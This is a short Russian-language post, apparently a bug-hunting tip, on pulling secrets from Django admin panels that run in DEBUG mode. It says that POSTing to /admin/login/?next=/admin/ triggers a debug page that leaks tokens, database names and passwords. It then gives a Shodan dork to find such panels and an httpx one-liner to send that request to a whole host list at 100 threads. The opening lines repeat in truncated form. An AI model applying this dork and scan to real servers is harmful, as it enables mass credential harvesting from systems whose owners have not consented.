📇 Получение конфиденциальной информации в админ панелях Django
Это довольно легкий способ поиска критической уязвимости. Если в Django включен
При обращении к:
Нас перенаправляет на:
Достаточно поменять запрос на
Искать подобные панели можно в Shodan с помощью дорка:
А если у вас есть список хостов и вы хотите пройтись проверкой по этому списку, то можете использовать httpx:
#web #django
Это довольно легкий способ поиска критической уязвимости. Если в Django включен
DEBUG мод, мы можем изменить запрос на POST и получить вывод с критической информацией, содержащей токены, имена баз данных и пароли от сервера и др.При обращении к:
https://target/admin
Нас перенаправляет на:
https://target/admin/login/?next=/admin/
Достаточно поменять запрос на
POST и мы получим интересный вывод от DEBUG мода (см. скрин снизу).Искать подобные панели можно в Shodan с помощью дорка:
html:"/login/?next/=" title:"Django"
А если у вас есть список хостов и вы хотите пройтись проверкой по этому списку, то можете использовать httpx:
httpx -l hosts.txt -threads 100 -x POST -paths /admin/login/?next=/admin/ -title -tech-detect -status-code -follow-redirects
#web #django